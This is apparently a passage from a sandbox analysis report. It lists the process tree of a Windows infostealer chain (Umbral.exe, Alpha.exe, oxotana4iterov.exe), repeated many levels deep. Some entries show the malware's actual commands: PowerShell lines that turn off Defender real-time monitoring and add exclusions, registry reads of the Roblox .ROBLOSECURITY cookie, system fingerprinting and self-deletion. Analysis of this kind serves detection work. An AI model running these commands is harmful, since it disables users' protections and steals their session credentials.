        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        54⤵
        
        PID:4216
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        55⤵
        
        PID:664
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        55⤵
        Views/modifies file attributes
        
        PID:1776
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        55⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1940
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        55⤵
        
        PID:2396
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        55⤵
        
        PID:2972
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        56⤵
        
        PID:4140
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        55⤵
        
        PID:1956
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        55⤵
        
        PID:5024
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        55⤵
        
        PID:1484
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        55⤵
        
        PID:904
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        55⤵
        
        PID:4288
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        56⤵
        
        PID:3148
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        55⤵
        Detects videocard installed
        
        PID:5108
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        55⤵
        
        PID:2340
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        56⤵
        
        PID:2152
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        56⤵
        Runs ping.exe
        
        PID:3796
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        54⤵
        
        PID:976
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        55⤵
        
        PID:4332
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        55⤵
        
        PID:2744
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        56⤵
        
        PID:4924
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        56⤵
        
        PID:4876
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        57⤵
        
        PID:2304
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        58⤵
        
        PID:4884
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        58⤵
        Views/modifies file attributes
        
        PID:1484
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        58⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4524
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        58⤵
        
        PID:4584
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        58⤵
        
        PID:4588
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        57⤵
        
        PID:2192
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        58⤵
        
        PID:3772
        
        C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
        58⤵
        
        PID:1464
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        58⤵
        
        PID:4472
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        59⤵
        
        PID:1904
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        57⤵
        
        PID:1560
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        58⤵
        
        PID:1520
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        56⤵
        
        PID:2520
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        57⤵
        
        PID:2972
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        58⤵
        
        PID:1372
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        59⤵
        
        PID:4924
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        55⤵
        
        PID:1996
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        56⤵
        
        PID:1528
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        57⤵
        
        PID:244
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        58⤵
        
        PID:1940
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        54⤵
        Modifies registry class
        
        PID:1480
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        55⤵
        
        PID:2900
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        56⤵
        
        PID:4840
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        57⤵
        
        PID:4708
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        53⤵
        Modifies registry class
        
        PID:572
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        54⤵
        
        PID:4456
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        55⤵
        
        PID:2580
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        56⤵
        
        PID:4660
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        52⤵
        Modifies registry class
        
        PID:2076
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        53⤵
        
        PID:1216
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        54⤵
        
        PID:4676
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        55⤵
        
        PID:2476
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        51⤵
        Modifies registry class
        
        PID:396
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        52⤵
        
        PID:3192
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        53⤵
        
        PID:3412
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        54⤵
        
        PID:3164
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        50⤵
        Modifies registry class
        
        PID:2816
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        51⤵
        
        PID:1812
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        52⤵
        
        PID:812
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        53⤵
        
        PID:3220
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        49⤵
        Modifies registry class
        
        PID:2520
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        50⤵
        
        PID:2720
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        51⤵
        
        PID:3232
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        52⤵
        
        PID:3968
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        48⤵
        Modifies registry class
        
        PID:664
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        49⤵
        
        PID:1876
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        50⤵
        
        PID:3224
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        51⤵
        
        PID:900
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        51⤵
        
        PID:2340
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        47⤵
        Modifies registry class
        
        PID:2072
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        48⤵
        
        PID:4832
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        49⤵
        
        PID:2996
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        50⤵
        
        PID:1540
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        46⤵
        Modifies registry class
        
        PID:2092
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        47⤵
        
        PID:1608
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        48⤵
        
        PID:5040
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        49⤵
        
        PID:2828
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        45⤵
        Modifies registry class
        
        PID:3060
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        46⤵
        
        PID:2396
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        47⤵
        
        PID:900
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        48⤵
        
        PID:2760
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        44⤵
        Modifies registry class
        
        PID:3796
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        45⤵
        
        PID:2988
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        46⤵
        
        PID:2832
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        47⤵
        
        PID:4752
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        43⤵
        Modifies registry class
        
        PID:1296
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        44⤵
        
        PID:328
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        45⤵
        
        PID:2764
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        46⤵
        
        PID:3200
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        42⤵
        Modifies registry class
        
        PID:4992
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        43⤵
        
        PID:4668
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        44⤵
        
        PID:4588
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        45⤵
        
        PID:5024
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        41⤵
        Modifies registry class
        
        PID:4140
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        42⤵
        
        PID:4428
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        43⤵
        
        PID:4908
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        44⤵
        
        PID:1920
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        40⤵
        Modifies registry class
        
        PID:4272
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        41⤵
        
        PID:900
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        42⤵
        
        PID:4684
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        43⤵
        
        PID:1352
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        39⤵
        Modifies registry class
        
        PID:2108
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        40⤵
        
        PID:4216
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        41⤵
        
        PID:3176
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        42⤵
        
        PID:996
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        38⤵
        Modifies registry class
        
        PID:4676
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        39⤵
        
        PID:2208
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        40⤵
        
        PID:5052
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        41⤵
        
        PID:3288
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        37⤵
        Modifies registry class
        
        PID:3940
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        38⤵
        
        PID:1560
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        39⤵
        
        PID:328
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        40⤵
        
        PID:4640
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        36⤵
        Modifies registry class
        
        PID:1844
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        37⤵
        
        PID:2572
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        38⤵
        
        PID:4112
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        39⤵
        
        PID:4164
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        35⤵
        Modifies registry class
        
        PID:4300
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        36⤵
        
        PID:2072
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        37⤵
        
        PID:5004
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        38⤵
        
        PID:4948
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        34⤵
        Modifies registry class
        
        PID:1996
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        35⤵
        
        PID:2080
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        36⤵
        
        PID:3620
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        37⤵
        
        PID:2388
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        33⤵
        Modifies registry class
        
        PID:1512
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        34⤵
        
        PID:4968
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        35⤵
        
        PID:5028
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        36⤵
        
        PID:2076
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        32⤵
        Modifies registry class
        
        PID:4124
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        33⤵
        
        PID:3044
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        34⤵
        
        PID:4908
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        35⤵
        
        PID:4988
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        31⤵
        Modifies registry class
        
        PID:4556
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        32⤵
        
        PID:1736
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        33⤵
        
        PID:2816
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        34⤵
        
        PID:1612
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        30⤵
        Modifies registry class
        
        PID:2804
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        31⤵
        
        PID:3004
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        32⤵
        
        PID:3780
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        33⤵
        
        PID:2072
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        29⤵
        Modifies registry class
        
        PID:2716
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        30⤵
        
        PID:2252
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        31⤵
        
        PID:4928
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        32⤵
        
        PID:1868
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        28⤵
        Modifies registry class
        
        PID:1608
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        29⤵
        
        PID:1932
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        30⤵
        
        PID:2384
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        31⤵
        
        PID:2076
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        27⤵
        Modifies registry class
        
        PID:1656
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        28⤵
        
        PID:2580
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        29⤵
        
        PID:4904
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        30⤵
        
        PID:2720
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        30⤵
        
        PID:2396
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        26⤵
        Modifies registry class
        
        PID:1800
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        27⤵
        
        PID:2776
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        28⤵
        
        PID:4116
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        29⤵
        
        PID:3132
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        25⤵
        Modifies registry class
        
        PID:3800
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        26⤵
        
        PID:4660
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        27⤵
        
        PID:1840
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        28⤵
        
        PID:4016
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        24⤵
        Modifies registry class
        
        PID:1580
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        25⤵
        
        PID:3156
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        26⤵
        
        PID:1736
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        27⤵
        
        PID:5028
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        23⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:2988
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        24⤵
        
        PID:3152
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        25⤵
        
        PID:4304
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        26⤵
        
        PID:2828
        
        C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxotana4iterov.exe"
        22⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:1348
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\gn4kMFDzyxtNMy.vbe"
        23⤵
        
        PID:2384
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\t57a9grPX.bat" "
        24⤵
        
        PID:2988
        
        C:\WinRAR\UnZiper.exe
        
